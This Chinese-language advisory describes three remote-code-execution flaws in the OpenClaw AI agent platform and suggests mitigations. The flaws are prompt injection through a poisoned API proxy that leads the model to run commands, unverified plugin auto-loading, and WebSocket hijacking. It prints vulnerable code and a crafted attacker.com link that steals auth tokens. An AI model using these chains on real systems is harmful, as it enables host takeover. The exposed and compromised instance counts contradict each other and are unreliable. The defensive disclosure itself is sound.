OpenClaw 三大高危 RCE 漏洞全解析

AI 代理平台在提升运维与自动化效率的同时，其安全风险正快速暴露。

近期，OpenClaw连续被曝出三个可直接导致远程代码执行（RCE）的高危漏洞，分别为请求流注入、插件自动加载、跨站 WebSocket 劫持，均能在低门槛条件下实现主机完全接管。

本文基于完整漏洞复现资料，对 CVE-2026-30741、CVE-2026-32920、CVE-2026-25253 进行全覆盖拆解，还原攻击链路，给出分析建议。

本次披露的三个漏洞均属于远程代码执行类高危漏洞，覆盖OpenClaw从请求输入、插件生态到前端会话的全链路，无需强认证、无需复杂交互即可利用，对生产环境威胁极大。

CVE-2026-30741存在于 OpenClaw Agent Platform v2026.2.6 及更早版本，由OpenClaw请求侧提示注入引发输入校验失效导致，CVSS 3.1 评分为 9.8 分，攻击者无需身份认证及用户交互，可通过构造恶意请求直接在目标系统执行任意代码，实现远程完全接管。

该漏洞源于Openclaw没有对上游API请求做完整性校验。攻击者可构造恶意请求 “投毒” 请求流，绕过Openclaw安全限制并注入可执行代码逻辑，诱导 AI 模型生成未授权终端命令，通过MCP工具链自动执行，最终实现未授权任意命令可执行。

上述CVE的攻击流程可梳理如下：

1. 用户在OpenClaw上配置恶意API代理地址（该地址用于中转访问大模型，攻击者事前篡改该服务，对用户的请求流进行污染）；

2. 用户通过OpenClaw向AI发送正常对话请求（此时，用户对话已经被攻击者劫持）；

3. 恶意代理劫持用户请求，注入恶意提示词；

4. AI模型被诱导生成恶意命令；

5. OpenClaw接收命令，自动执行；

6. 攻击者达到攻击目的，可远程控制OpenClaw所在主机。

CVE-2026-30741，属于请求侧提示注入导致的远程代码执行漏洞，CVSS评分9.8。

若受影响Openclaw系统未能及时修复，攻击者可通过持续“毒化”使用者上下文的方式，在Openclaw所在主机中注入恶意程序，最终导致Openclaw服务器被完全接管、数据泄露、业务瘫痪。

1. 升级至v2026.3.11及以上版本（官方已发布补丁）。

2. 输入验证与转义：对所有外部输入进行严格的白名单校验，避免动态代码生成。

3. 最小权限原则：限制OpenClaw运行账户的系统权限，降低被利用后的危害。

CVE-2026-32920是OpenClaw Agent Platform v2026.3.11及更早版本存在的高危远程代码执行漏洞，CVSS 3.1评分为9.2分。OpenClaw会自动从 .OpenClaw/extensions/ 目录发现并加载插件，且未进行显式的信任验证。攻击者可通过构造恶意工作区插件，在无身份验证条件下实现远程代码执行与系统控制。

该漏洞源于Openclaw的工作区插件自动加载机制存在安全设计缺陷，Openclaw平台在启动时会无条件扫描、加载当前工作目录下的第三方插件，在未得到信任校验的情况下，直接将外部不可信工作区目录等同于官方可信目录，导致信任边界被破坏。

攻击者可通过构造携带恶意插件的工作区，使平台在无授权、无交互的情况下自动加载并执行恶意代码，最终触发远程代码执行。

漏洞核心代码位于平台插件加载模块：

com.openclaw.agent.core.plugin.WorkspacePluginLoader 类的 autoLoadWorkspacePlugins () 方法。

// 漏洞核心方法

void autoLoadWorkspacePlugins() {

   // 1. 获取当前用户可控的工作区路径

   String workspacePath = getCurrentWorkspacePath();

   // 2. 拼接插件目录（不可信路径）

   String pluginDir = workspacePath + “/plugins”;

   // 3. 扫描所有插件（无过滤）

   List<Plugin> plugins = scanAllPlugins(pluginDir);

   // 4. 直接加载 + 激活执行（无校验、无信任验证）

   for (Plugin plugin : plugins) {

       loadPlugin(plugin);   // 加载代码

       activatePlugin(plugin); // 执行代码

   }

}

上述CVE的攻击流程可梳理如下：

1. 攻击者提前发布携带攻击代码的智能体插件，并开启监听服务；

2. 用户在OpenClaws的插件工作区上配置该插件；

3. 用户调用Openclaw服务时，Openclaw会自动加载该插件，并运行插件中的恶意代码，导致漏洞触发；

4. 攻击者成功GetShell，达到攻击目的，可远程控制OpenClaw所在主机。

CVE-2026-32920，属于Openclaw插件自动加载导致的远程代码执行漏洞，CVSS评分9.2。

若受影响Openclaw系统未能及时修复，攻击者可通过恶意插件，在受害者Openclaw环境中开启后门，最终导致Openclaw服务器被完全接管、数据泄露、业务瘫痪。

1. 升级最新版Openclaw。

2. 避免加载外部不明来源的插件。

CVE-2026-25253是OpenClaw Agent Platform v2026.1.28及更早版本中存在的高危远程代码执行漏洞，CVSS 3.1评分为8.8分。该漏洞已在野外被积极利用，影响超过 24,478个公开暴露的实例 ，其中超过 30,000个实例已被入侵。

OpenClaw 前端加载时未对URL传入的gatewayUrl参数做有效校验，且会自动附加浏览器存储的有效authToken向指定地址建立WebSocket连接，同时后端Gateway服务缺失WebSocket连接Origin头校验。这导致攻击者可通过构造恶意链接，诱导已登录状态的用户点击，在无需额外身份验证的前提下窃取会话Token，进而直接调用Gateway API实现远程代码执行与系统完全控制。

该漏洞存在于OpenClaw的Control UI前端初始化逻辑中。在受影响的版本中，应用程序会从URL查询字符串中读取gatewayUrl参数，并未经用户确认自动建立WebSocket连接 ，同时将存储在localStorage中的认证令牌（auth token）发送到指定的WebSocket端点。

漏洞代码如下：

– 从查询字符串获取gatewayUrl并自动连接

export class SocketClient {

 connect() {

   const params = new URLSearchParams(window.location.search);

   const customGateway = params.get(‘gatewayUrl’); // ❌ 未验证

   const targetUrl = customGateway || getDefaultUrl();

   this.ws = new WebSocket(targetUrl);

   this.ws.onopen = () => {

     this.sendAuth(localStorage.getItem(‘auth_token’));  // ❌ 自动发送令牌

   };

 }

}

攻击者利用此漏洞实施远程控制的攻击链，整个过程仅需用户点击一个恶意链接或访问恶意网站。

攻击流程如下：

1. 攻击者诱骗受害者访问恶意网页或点击crafted链接，如：

http://localhost:18789/?gatewayUrl=ws://attacker.com/

2. 认证令牌泄露 ：受害者的浏览器自动向攻击者控制的WebSocket服务器发起连接，并在握手过程中自动附带认证令牌。

3. 攻击者可使用窃取的令牌直接连接到受害者的本地OpenClaw实例。

CVE-2026-25253，属于Openclaw WebSocket被跨站劫持导致远程代码执行漏洞，CVSS评分8.8。

若受影响Openclaw系统未能及时修复，攻击者可通过“钓鱼”或“水坑”的方式，诱骗受害者点击，最终导致身份认证凭证被窃取。攻击者可利用该凭证，实现登陆该Openclaw实例，并通过修改配置，实现任意命令执行，最终可导致Openclaw服务器被完全接管、数据泄露、业务瘫痪。

1. 及时更新Openclaw版本。

2. 修改gatewayUrl需要用户显式确认。

本次OpenClaw三大漏洞共同指向一个核心问题：AI能力与系统执行权限之间缺少安全隔离。一旦输入被控制、组件被篡改、会话被劫持，系统将直接暴露在RCE风险下。

对企业而言，部署OpenClaw等AI代理平台时，必须坚持：